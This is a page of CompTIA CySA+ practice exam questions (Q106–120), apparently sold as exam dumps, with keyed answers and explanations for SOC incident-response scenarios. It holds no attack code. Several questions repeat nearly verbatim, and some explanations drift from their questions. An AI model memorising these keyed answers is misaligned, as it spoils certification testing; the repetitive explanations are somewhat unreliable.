CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 8 Q106-120
Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.
Question 106
A SOC analyst notices several Windows endpoints initiating repeated remote desktop connections to unknown external IP addresses outside business hours. These connections are executed by unsigned scripts and involve privilege escalation attempts. What is the most likely threat, and what is the immediate SOC response?
A) Routine remote administration; allow connections.
B) Unauthorized remote access by malware; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured RDP settings; update configuration.
D) User training exercises; notify users.
Answer: B)
Explanation:
Option A assumes routine remote administration. Standard remote administration is predictable, involves known IP addresses, and uses signed scripts or approved software. Unsigned scripts initiating off-hour connections to unknown IPs are highly anomalous. Ignoring this could allow malware to establish persistent remote access, escalate privileges, and exfiltrate sensitive information. Administrative activity is auditable and usually documented, making unexpected remote connections outside business hours a clear warning sign. Treating this as legitimate could allow attackers to maintain covert access and bypass security controls.
Option B is correct. Malware often leverages remote desktop protocols to gain control of endpoints and escalate privileges. Indicators include off-hours activity, unsigned scripts, external unknown IP addresses, and attempts to escalate privileges. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining the scripts to identify the malware’s behavior and persistence mechanisms. Network traffic should be analyzed to identify the source and destination of these connections, and threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning affected systems, updating detection and prevention rules, and monitoring the environment for similar activity. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and allows the SOC to develop improved detection strategies for future threats. Ignoring such activity risks long-term persistence of malware, credential theft, and lateral movement across the network.
Option C assumes misconfigured RDP settings. Misconfigurations usually result in access errors or failed connections and do not explain off-hours privilege escalation or unsigned scripts executing unknown connections. Treating this as benign could leave endpoints vulnerable to compromise.
Option D assumes user training exercises. Legitimate exercises are scheduled, documented, and use authorized systems. Off-hours, unsigned scripts connecting to unknown external IPs are inconsistent with training behavior. Assuming this is benign allows attackers to exploit endpoints without detection.
Selecting option B ensures that immediate containment, forensic analysis, and remediation occur while preserving evidence. It prevents lateral movement, identifies malicious infrastructure, and strengthens overall detection and response capabilities.
Question 107
A SOC analyst observes Linux endpoints repeatedly sending encrypted low-volume traffic to external IP addresses that are not part of business operations. The traffic occurs during off-hours and uses non-standard ports. What is the most likely threat, and what is the immediate SOC response?
A) Routine system updates; allow traffic.
B) Malware establishes covert command-and-control channels; isolates endpoints, captures traffic, and analyzes processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, occur over standard ports, and connect to verified vendor servers. Persistent encrypted traffic over unusual ports to unknown external IPs is inconsistent with normal update behavior. Ignoring this could allow malware to maintain command-and-control channels and exfiltrate sensitive data undetected.
Option B is correct. Malware frequently establishes covert channels using non-standard ports and encryption to evade detection. Key indicators include off-hours activity, persistent low-volume traffic, and connections to unknown external IPs. Immediate SOC response involves isolating the affected endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify malicious processes. Threat intelligence may reveal known malicious infrastructure, and remediation involves cleaning affected endpoints, updating firewall and detection rules, and monitoring other systems for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident analysis, and future threat detection improvements. Failing to respond allows persistent malware access, potential lateral movement, and data exfiltration.
Option C assumes misconfigured network services. Misconfigurations typically cause failed connections or predictable errors, not persistent encrypted traffic to unknown hosts. Treating this as benign could leave malware undetected.
Option D assumes legitimate cloud synchronization. Cloud services are predictable, operate on known domains and ports, and usually occur during business hours. Observed off-hour activity is inconsistent with normal synchronization behavior.
Selecting option B ensures rapid containment, forensic analysis, and remediation while protecting sensitive data and maintaining network integrity.
Question 108
A SOC analyst identifies endpoints generating frequent DNS queries to newly registered domains with high-entropy subdomains. The queries occur off-hours and are low-volume but continuous. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Legitimate queries involve known domains with predictable subdomains. Persistent queries to newly registered domains with high-entropy subdomains outside business hours indicate abnormal behavior. Allowing this could enable attackers to exfiltrate data undetected. Normal DNS resolution is designed for legitimate name resolution and typically produces predictable query patterns correlated with operational needs. Ignoring anomalous queries exposes the network to covert malware communications.
Option B is correct. DNS tunneling encodes information in DNS queries to bypass security controls. Key indicators include high-frequency, low-volume queries, newly registered domains, high-entropy subdomains, and off-hours activity. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected hosts to prevent exfiltration, and performing endpoint forensics to identify responsible processes. Correlating logs with threat intelligence helps identify external attacker infrastructure. Remediation includes cleaning infected systems, updating detection rules, and monitoring for similar activity. Preserving evidence ensures regulatory compliance and effective post-incident investigation. Failing to respond allows attackers to maintain persistent covert channels.
Option C assumes misconfigured DNS servers. Misconfigurations generate predictable failures and do not create frequent, high-entropy queries to unknown domains. Treating this as benign could allow malware to continue undetected.
Option D assumes antivirus telemetry. Legitimate telemetry uses known vendor domains and predictable schedules. Off-hours, frequent high-entropy queries are inconsistent with standard antivirus operations. Misclassification risks ongoing compromise.
Selecting option B ensures containment, investigation, and remediation of covert malware activity while protecting sensitive data and maintaining network integrity.
Question 109
A SOC analyst observes endpoints accessing rarely used network shares, reading portions of files, and attempting unauthorized writes outside business hours across multiple systems. What is the most likely threat, and what is the immediate SOC response?
A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups involve full file access, scheduled timing, and known accounts. Accessing portions of rarely used network shares with unauthorized writes across multiple systems is abnormal. Ignoring this could allow malware to map resources and propagate laterally.
Option B is correct. Malware performs lateral movement by probing network shares, reading files partially, and attempting unauthorized writes. Indicators include off-hours activity, multi-system involvement, and unauthorized file access. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, performing endpoint forensics, and correlating findings with SIEM logs to identify impacted accounts and systems. Remediation includes cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving evidence supports regulatory compliance, forensic investigations, and improved detection of similar future attacks. Neglecting this allows malware to maintain persistence, gather credentials, and exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations are predictable and typically limited to single endpoints. Multi-system off-hour unauthorized access is inconsistent with this scenario. Treating this as benign allows continued compromise.
Option D assumes legitimate off-hours user activity. Users rarely access unused shares and attempt unauthorized writes simultaneously. Misclassification risks data exposure and persistent compromise.
Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement.
Question 110
A SOC analyst observes Windows endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, modify registry keys, and attempt to disable antivirus services. Multiple endpoints are affected outside business hours. What is the most likely threat, and what is the immediate SOC response?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative PowerShell scripts. Legitimate scripts are signed, predictable, and documented. Obfuscated scripts that download payloads, modify registry keys for persistence, and attempt to disable antivirus services indicate malicious behavior. Ignoring these risks, persistent malware operations, lateral movement, and exfiltration. Administrative scripts produce logs and follow scheduled execution, whereas the described behavior deviates from standard norms. Treating malicious activity as normal administrative work could allow attackers to maintain control undetected.
Option B is correct. Fileless malware utilizes PowerShell to execute entirely in memory, bypassing traditional security controls. It establishes persistence via registry modifications, disables antivirus services to avoid detection, and downloads additional payloads for further compromise. Indicators include off-hours activity, multiple endpoints affected, obfuscation, and external connections. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and analyzing the scripts to identify malware behavior and command-and-control mechanisms. Network traffic should be analyzed to identify external servers, and threat intelligence can provide context regarding attacker infrastructure. Remediation includes cleaning endpoints, restoring antivirus and logging functionality, updating detection rules, and monitoring the network for similar threats. Preserving evidence ensures regulatory compliance, supports investigation, and allows improvement of threat detection capabilities. Ignoring activity could result in widespread compromise, credential theft, and persistent access.
Option C assumes misconfigured automation tasks. Misconfigurations rarely include obfuscation, registry modification, antivirus disabling, or multiple off-hours affected endpoints. Treating this as benign could allow persistent malware to spread undetected.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable. Off-hours, obfuscated scripts downloading payloads and disabling security controls do not align with testing activity. Misclassification risks extended compromise and data loss.
Selecting option B ensures immediate containment, forensic analysis, and remediation, balancing rapid response with thorough investigation and protection of sensitive systems.
Question 111
A SOC analyst observes several endpoints sending outbound SMTP traffic to unknown external email addresses during off-hours. The emails contain encrypted attachments and originate from processes not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Normal business emails; allow traffic.
B) Malware performing covert data exfiltration via email; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured email relay; update configuration.
D) User testing of email systems; notify users.
Answer: B)
Explanation:
Option A assumes normal business emails. Legitimate email traffic follows predictable patterns, originates from authorized users, and targets known recipients. Unusual outbound SMTP traffic during off-hours to unknown external addresses with encrypted attachments is inconsistent with standard operations. Ignoring this could allow malware to exfiltrate sensitive information, bypassing data loss prevention controls, and remain undetected for extended periods. Business emails are usually logged and monitored, making sudden off-hour anomalies highly suspicious.
Option B is correct. Malware can leverage outbound email to exfiltrate sensitive data covertly. Indicators include off-hours activity, unknown recipients, encrypted attachments, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic to examine the emails and identify associated processes, and analyzing affected systems for malware presence. Analysts should examine mail headers, extract attachments, and cross-reference IPs and domains with threat intelligence sources. Remediation includes cleaning infected endpoints, updating email filtering rules, monitoring for similar activity, and notifying affected users and administrators. Preserving forensic evidence supports regulatory compliance and allows for post-incident analysis to identify how attackers bypassed existing controls. Ignoring such activity could result in sustained exfiltration, data compromise, and reputational damage.
Option C assumes a misconfigured email relay. Misconfigurations typically produce failed message deliveries or errors, not repeated off-hours outbound messages with encrypted attachments. Treating this as benign could allow malware to continue exfiltrating data undetected.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable, with known recipients. Off-hours activity targeting unknown external email addresses is inconsistent with testing. Ignoring this could allow attackers to operate freely, increasing the scope and impact of the compromise.
Selecting option B ensures rapid containment, forensic analysis, and remediation. By isolating endpoints and analyzing the network traffic and processes, the SOC can prevent further data exfiltration, identify malware behavior, and strengthen monitoring rules to detect similar attacks in the future. This approach balances immediate response with thorough investigation while preserving evidence for compliance and threat intelligence purposes.
Question 112
A SOC analyst identifies endpoints repeatedly attempting to connect to IP addresses listed in threat intelligence feeds. The connections occur during off-hours and are executed by unknown scripts that escalate privileges. What is the most likely threat, and what is the immediate SOC response?
A) Routine system updates; allow connections.
B) Malware attempting to communicate with command-and-control infrastructure; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured threat intelligence integration; update configuration.
D) User security testing; notify users.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, connect to known vendor servers, and occur at scheduled times. Continuous connections to IPs flagged in threat intelligence feeds, initiated by unknown scripts with privilege escalation, are inconsistent with normal operations. Ignoring this could allow malware to maintain persistent command-and-control communication, download additional payloads, and evade detection for extended periods.
Option B is correct. Malware often targets command-and-control servers listed in threat intelligence feeds. Indicators include off-hours activity, unknown scripts, privilege escalation, and connections to malicious IPs. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory to analyze executing scripts, and monitoring network traffic to understand the extent of communication with external servers. Analysts should correlate activity with threat intelligence, identify malicious processes, and remediate by cleaning endpoints, updating detection rules, and monitoring for similar behavior. Preserving forensic evidence supports regulatory compliance, incident reporting, and future threat hunting. Ignoring the activity allows malware to maintain covert operations, potentially compromising additional systems and exfiltrating sensitive data.
Option C assumes misconfigured threat intelligence integration. Misconfigurations do not explain privilege escalation or execution of unknown scripts. Treating this as benign could leave malware undetected and active in the environment.
Option D assumes user security testing. Legitimate testing is scheduled, documented, and predictable. Off-hours execution of unknown scripts connecting to flagged malicious IPs is inconsistent with testing and should not be ignored.
Selecting option B ensures containment, forensic analysis, and remediation of malware activity. By isolating endpoints, analyzing memory, and monitoring network traffic, the SOC can prevent lateral movement, identify malware functionality, and strengthen detection rules. This proactive approach protects sensitive data, maintains system integrity, and supports compliance requirements.
Question 113
A SOC analyst observes endpoints executing PowerShell scripts that create scheduled tasks to maintain persistence and disable Windows Defender. These scripts download additional payloads from external IP addresses during off-hours. What is the most likely threat, and what should the SOC do first?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell to maintain persistence and evade detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured scheduled tasks; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative PowerShell scripts. Administrative activity is predictable, signed, and documented. Scripts that create scheduled tasks to maintain persistence, disable antivirus services, and download payloads from external sources are clearly malicious. Ignoring this could allow malware to persist, evade detection, and compromise additional endpoints. Administrative scripts do not typically execute off-hours, modify system defenses, or download unverified payloads.
Option B is correct. Fileless malware frequently leverages PowerShell to execute in memory, evade detection, and maintain persistence. Indicators include off-hours execution, creation of scheduled tasks, disabling Windows Defender, and downloading additional payloads from untrusted external sources. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing memory for forensic analysis to identify malware behavior, and analyzing scripts to determine persistence and payload delivery mechanisms. Network traffic should be monitored for outbound connections to malicious servers, and threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected systems, restoring security configurations, updating detection rules, and monitoring the network for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and enhances future threat detection. Ignoring this behavior allows malware to maintain control of endpoints and potentially exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically do not include script obfuscation, disabling antivirus, or downloading external payloads. Treating this as benign allows malware persistence and propagation.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable, without bypassing security mechanisms. Off-hours execution of malicious scripts is inconsistent with testing behavior.
Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing malware persistence and future compromise.
Question 114
A SOC analyst identifies endpoints performing repeated unauthorized attempts to access sensitive database tables. These attempts occur during off-hours and originate from processes not approved by IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine database maintenance; allow access.
B) Malware or malicious insider attempting data exfiltration; isolate endpoints, review logs, and analyze processes.
C) Misconfigured database permissions; correct configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine database maintenance. Maintenance tasks are predictable, scheduled, and executed by authorized personnel. Unauthorized access attempts by unapproved processes during off-hours are anomalous and inconsistent with legitimate operations. Ignoring this could allow data exfiltration, system compromise, or insider threat activity to continue undetected.
Option B is correct. Malware or malicious insiders often attempt unauthorized access to sensitive database tables to steal data or prepare for lateral movement. Indicators include off-hours activity, unapproved processes, and repeated attempts targeting sensitive resources. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized access, reviewing database logs to determine which tables and records were targeted, and analyzing the processes responsible for the attempts. Threat intelligence may provide insights into malware used for database exploitation. Remediation includes revoking unauthorized access, cleaning infected endpoints, updating monitoring rules, and auditing accounts and permissions. Preserving forensic evidence ensures regulatory compliance and supports incident investigations. Failure to respond could result in sustained data compromise, financial loss, and reputational damage.
Option C assumes misconfigured database permissions. Misconfigurations typically produce failed attempts without repeated activity or process-level anomalies. Treating this as benign risks continued data access by attackers.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours unauthorized attempts by unapproved processes are inconsistent with testing activity.
Selecting option B ensures proper containment, forensic analysis, and remediation to prevent data exfiltration, detect malicious behavior, and maintain database integrity.
Question 115
A SOC analyst observes endpoints executing scripts that repeatedly attempt to disable endpoint detection and response (EDR) software while contacting unknown external IPs. These scripts run under elevated privileges during off-hours. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass security controls and establish persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured EDR policies; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate administrative scripts are predictable, documented, and signed. Scripts that disable EDR software, execute under elevated privileges, and contact unknown external IPs are clearly malicious. Ignoring this could allow malware to bypass security controls, maintain persistence, and exfiltrate sensitive data.
Option B is correct. Malware often attempts to disable endpoint security tools to evade detection and maintain persistence. Indicators include elevated privilege execution, off-hours activity, external communication with unknown IPs, and attempts to tamper with security software. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and analyzing scripts to understand attack vectors and malware behavior. Network traffic should be monitored for suspicious communication, and threat intelligence can provide context regarding known malicious infrastructure. Remediation includes cleaning infected systems, restoring EDR functionality, updating detection rules, and monitoring the environment for similar attempts. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring such activity allows malware to persist, evade detection, and potentially compromise additional systems.
Option C assumes misconfigured EDR policies. Misconfigurations typically do not result in scripts executing externally with elevated privileges. Treating this as benign risks continued compromise and undetected malware activity.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable. Off-hours execution with security bypass and external connections is inconsistent with testing activity.
Selecting option B ensures containment, forensic analysis, and remediation while protecting endpoints, preventing lateral movement, and maintaining network integrity.
Question 116
A SOC analyst notices endpoints repeatedly attempting to modify system log files and disable auditing services during off-hours. The activity originates from scripts not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine system maintenance; allow activity.
B) Malware attempting to cover tracks and maintain persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured auditing policies; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine system maintenance. Legitimate maintenance follows documented schedules, uses approved tools, and does not attempt to disable auditing services or modify log files maliciously. Ignoring the activity under this assumption could allow attackers to erase evidence of their activity, maintain persistence, and conduct further malicious operations undetected. Maintenance activities are auditable and predictable, unlike anomalous scripts attempting to bypass logging. Treating this activity as normal increases the risk of long-term compromise.
Option B is correct. Malware often modifies system logs and disables auditing to cover its tracks, evade detection, and maintain persistence. Key indicators include off-hours execution, execution by undocumented scripts, and attempts to tamper with system monitoring tools. Immediate SOC response should involve isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining the scripts to determine how persistence and log tampering occur. Analysts should correlate system logs and SIEM data to understand the scope of activity and identify additional compromised systems. Remediation includes cleaning affected endpoints, restoring logging and auditing functionality, updating detection rules to catch similar behavior, and continuous monitoring for signs of further tampering. Preserving forensic evidence is critical for regulatory compliance, post-incident investigation, and threat intelligence collection. Ignoring this activity allows malware to continue operating undetected, increasing the potential for data exfiltration, system compromise, or lateral movement across the network.
Option C assumes misconfigured auditing policies. Misconfigurations may generate errors but typically do not result in repeated attempts to delete logs or disable monitoring services. Treating this as benign would fail to detect active malware, allowing attackers to persist and evade detection.
Option D assumes user testing scripts. Testing is usually scheduled, documented, and predictable. Off-hours unauthorized modification of logs by undocumented scripts does not align with legitimate testing activity. Misclassifying this behavior risks leaving malware active in the environment, potentially causing data loss, operational disruption, or regulatory violations.
Selecting option B ensures immediate containment, forensic analysis, and remediation. By isolating endpoints and analyzing scripts and memory, the SOC can prevent further compromise, restore monitoring controls, and strengthen detection rules for similar threats in the future. This approach balances rapid response with thorough investigation and evidence preservation.
Question 117
A SOC analyst observes Linux endpoints initiating repeated outbound HTTPS requests to untrusted external IPs during off-hours. The requests are low-volume, encrypted, and generated by processes not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine system updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, connect to verified vendor servers, and occur over standard ports. Persistent low-volume encrypted traffic to unknown external IPs, executed by undocumented processes during off-hours, is anomalous. Ignoring this could allow malware to maintain command-and-control channels and exfiltrate sensitive data without detection.
Option B is correct. Malware frequently uses non-standard ports, encryption, and off-hours communication to maintain covert channels and evade security controls. Key indicators include off-hours traffic, low-volume but persistent connections, communication with unknown external IPs, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing network traffic to analyze the communication patterns, and performing endpoint forensics to identify the malicious processes. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and detection rules, and monitoring the network for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and future threat hunting. Failure to respond could allow persistent malware to compromise additional systems, escalate privileges, and exfiltrate sensitive data.
Option C assumes misconfigured network services. Misconfigurations typically cause failed connections or predictable errors rather than persistent encrypted communication to untrusted external IPs. Treating this as benign could allow malware to operate undetected.
Option D assumes legitimate cloud synchronization. Cloud services are predictable, operate with verified domains and standard ports, and typically occur during business hours. Off-hours activity from undocumented processes targeting untrusted IPs is inconsistent with normal synchronization.
Selecting option B ensures containment, forensic analysis, and remediation while preventing exfiltration and securing the network against covert malware activity.
Question 118
A SOC analyst detects Windows endpoints executing obfuscated PowerShell scripts that create scheduled tasks, disable antivirus services, and download additional payloads from external IPs. Multiple endpoints are affected outside business hours. What is the most likely threat, and what is the immediate SOC response?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured scheduled tasks; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate scripts are predictable, signed, and documented. Off-hours execution, obfuscation, disabling antivirus, and downloading payloads indicate malicious behavior. Ignoring this could allow malware to persist, evade detection, and compromise additional endpoints.
Option B is correct. Fileless malware often uses PowerShell to execute in memory, maintain persistence, disable antivirus, and download additional payloads from untrusted sources. Indicators include off-hours execution, creation of scheduled tasks, obfuscation, and multi-endpoint compromise. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and analyzing scripts to understand persistence mechanisms, payloads, and command-and-control communication. Network traffic analysis can identify attacker infrastructure, and threat intelligence can provide context on known malware. Remediation includes cleaning infected endpoints, restoring security functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence supports regulatory compliance and post-incident analysis. Failing to respond could allow malware to maintain persistent access and exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically are limited in scope and do not involve obfuscation, antivirus disabling, or payload downloading. Treating this as benign could allow malware to persist and propagate.
Option D assumes that unusual system activity is the result of legitimate user testing. In most IT and development environments, testing activities are structured, scheduled, and well-documented. These tests typically follow defined procedures, involve specific endpoints or applications, and operate within controlled parameters. Documentation ensures that testing can be distinguished from anomalous or malicious activity and that administrators are aware of when and where tests will occur. Predictable behavior, such as execution at scheduled times and expected outputs, is a key characteristic of legitimate testing.
However, the scenario described—activity occurring off-hours, involving security bypass, and affecting multiple endpoints—does not align with standard testing practices. Legitimate testing rarely requires disabling security controls, modifying logs, or deploying obfuscated scripts to avoid detection. Such behavior is indicative of deliberate attempts to conceal activity, maintain persistence, or evade monitoring. Multi-endpoint compromise further amplifies the concern, as routine tests are usually isolated to specific systems rather than impacting a broad range of devices across the network.
Treating this type of activity as benign testing introduces substantial risk. Malicious actors often mimic legitimate operations to avoid detection, performing actions during low-monitoring periods and using techniques that appear operationally similar to administrative tasks. If off-hours execution, security bypass, and widespread endpoint impact are misclassified as testing, malware may persist undetected, exfiltrate data, escalate privileges, or propagate laterally.
Proper response requires verification and investigation. Security teams must review logs, correlate activity with documented testing schedules, and analyze affected endpoints. Any activity inconsistent with approved testing procedures should be treated as suspicious and investigated thoroughly. In conclusion, off-hours execution, bypass of security controls, and multi-endpoint impact are inconsistent with legitimate testing, and assuming otherwise risks ongoing compromise and significant security exposure.
Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing persistent malware operations and safeguarding sensitive systems.
Question 119
A SOC analyst notices endpoints generating repeated DNS queries to newly registered domains with high-entropy subdomains. The queries are low-volume, highly frequent, and occur outside business hours. What is the most likely threat, and what should the SOC do first?
A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Legitimate DNS queries involve known domains with predictable subdomains. Frequent, low-volume, off-hours queries to newly registered domains with high-entropy subdomains indicate anomalous activity. Ignoring this could allow malware to exfiltrate data or maintain covert command-and-control channels undetected. Normal DNS resolution is predictable and does not involve dynamically generated subdomains or off-hours persistent activity.
Option B is correct. DNS tunneling encodes data within DNS queries to bypass network controls. Key indicators include high-frequency queries, off-hours timing, low volume, and communication with newly registered domains using high-entropy subdomains. Immediate SOC response involves capturing DNS traffic to decode exfiltrated data, isolating affected hosts to prevent further leakage, and performing endpoint forensics to identify responsible processes. Threat intelligence can help identify external attacker infrastructure. Remediation includes cleaning endpoints, updating detection rules to recognize DNS tunneling patterns, and monitoring for similar activity. Preserving evidence supports regulatory compliance, forensic investigation, and improvement of threat detection. Ignoring this activity risks sustained data exfiltration, persistent malware presence, and operational compromise.
Option C suggests that anomalous DNS activity could be attributed to misconfigured DNS servers. DNS misconfigurations are relatively common in enterprise networks and can lead to observable errors, such as failed domain resolutions, repeated queries to unreachable addresses, or misrouted requests. For example, incorrect forwarding rules, stale cache entries, or improperly configured zones can trigger error logs and generate repeat query attempts. These issues are generally predictable, easily traceable, and limited to authorized domains or internal resources. Administrators can usually identify the misconfigured server, diagnose the root cause, and correct the configuration without widespread disruption.
However, the scenario described—persistent queries with high-entropy subdomains—is inconsistent with the behavior caused by typical DNS misconfigurations. High-entropy subdomains, which contain seemingly random strings or encoded data, are rarely the result of accidental configuration errors. Instead, they are commonly associated with malicious activity, such as malware communication, data exfiltration, or command-and-control operations. Malware often uses DNS because it is a ubiquitous protocol, and its traffic is usually allowed through firewalls and monitoring tools. By encoding information in subdomains, attackers can transmit data covertly or maintain persistent communication with external servers while minimizing detection.
Treating this activity as benign is risky. Misclassifying high-entropy DNS queries as simple misconfiguration allows malware to maintain a foothold within the network undetected. Persistent queries directed at external domains, especially those that are recently registered or dynamically generated, are hallmarks of malware attempting to evade security measures. If left uninvestigated, this activity can facilitate ongoing exfiltration of sensitive data, remote control of compromised hosts, and lateral movement to other systems, substantially increasing the impact of a security breach.
Proper security response requires verification and analysis rather than assumption. Security teams should examine DNS query patterns, identify high-entropy subdomains, and correlate them with endpoint activity and network logs. Investigating the timing, frequency, and target domains of these queries is essential to differentiate between legitimate anomalies and malicious behavior. Memory and process forensics may also help identify the presence of malware or unauthorized scripts generating these queries.
While misconfigured DNS servers can produce errors and predictable resolution issues, they do not generate persistent queries with high-entropy subdomains. Such activity is highly indicative of malicious intent rather than benign misconfiguration. Treating these queries as routine or harmless can leave malware operational, enabling covert communication, data exfiltration, and continued compromise of organizational systems. Effective detection, verification, and remediation are critical to identifying unauthorized activity, protecting sensitive data, and ensuring the integrity of network operations.
Option D assumes antivirus telemetry. Telemetry occurs to known domains on a predictable schedule. Off-hours, high-frequency, high-entropy queries are inconsistent with standard antivirus activity.
Selecting option B ensures containment, forensic analysis, and remediation while protecting sensitive data and maintaining network integrity.
Question 120
A SOC analyst observes endpoints attempting repeated unauthorized access to sensitive file shares outside business hours. The attempts are executed by unknown processes, and several accounts are affected across multiple systems. What is the most likely threat, and what is the immediate SOC response?
A) Normal backup activity; allow access.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups involve predictable schedules, authorized accounts, and full file access. Partial access attempts to rarely used shares by unknown processes outside business hours are anomalous. Ignoring this could allow malware to map the network, exfiltrate sensitive information, or spread laterally.
Option B is correct. Malware frequently probes network shares to perform reconnaissance and lateral movement. Indicators include off-hours activity, multi-system targeting, repeated unauthorized access, and unknown process execution. Immediate SOC response involves isolating affected endpoints, reviewing access logs to determine the scope of attempts, performing endpoint forensics to identify responsible malware or processes, and correlating activity with SIEM data to identify affected accounts. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, incident analysis, and improved detection of similar threats. Ignoring this activity allows malware to persist, gather credentials, and potentially exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically affect a limited scope and do not explain multi-system unauthorized access attempts. Treating this as a benign risk, an ongoing compromise.
Option D assumes that unusual activity occurring during off-hours is legitimate user activity. In enterprise environments, off-hours activity does occur, such as automated backups, scheduled maintenance, or occasional system updates. However, normal user behavior rarely involves attempting unauthorized access to multiple rarely used shares during these periods. Typical off-hours operations are predictable, documented, and limited to specific systems and processes. When users access multiple rarely used or restricted resources, particularly outside normal working hours, it represents a deviation from expected behavior and should be treated as a potential security concern rather than a routine activity.
Malware and malicious actors often exploit off-hours periods because monitoring and oversight are reduced during nights, weekends, and holidays. During these windows, attackers can conduct reconnaissance, move laterally across the network, escalate privileges, or exfiltrate sensitive data with a lower likelihood of detection. Attempting access to multiple rarely used shares may indicate that malware is mapping the network to identify valuable targets or gathering information to maintain persistence and propagate further. Unauthorized access combined with off-hours activity is therefore a strong indicator of malicious behavior, rather than routine user operations.
Misclassifying this behavior as benign carries significant risk. If security teams dismiss such anomalies as normal off-hours activity, malware may continue operating undetected. Persistent threats can maintain a foothold in the network, exfiltrate confidential data, modify system configurations, or escalate privileges, increasing both the scope and impact of a compromise. In addition, ignoring off-hours anomalies undermines security governance and reduces the ability to respond proactively, leaving organizations vulnerable to prolonged exposure.
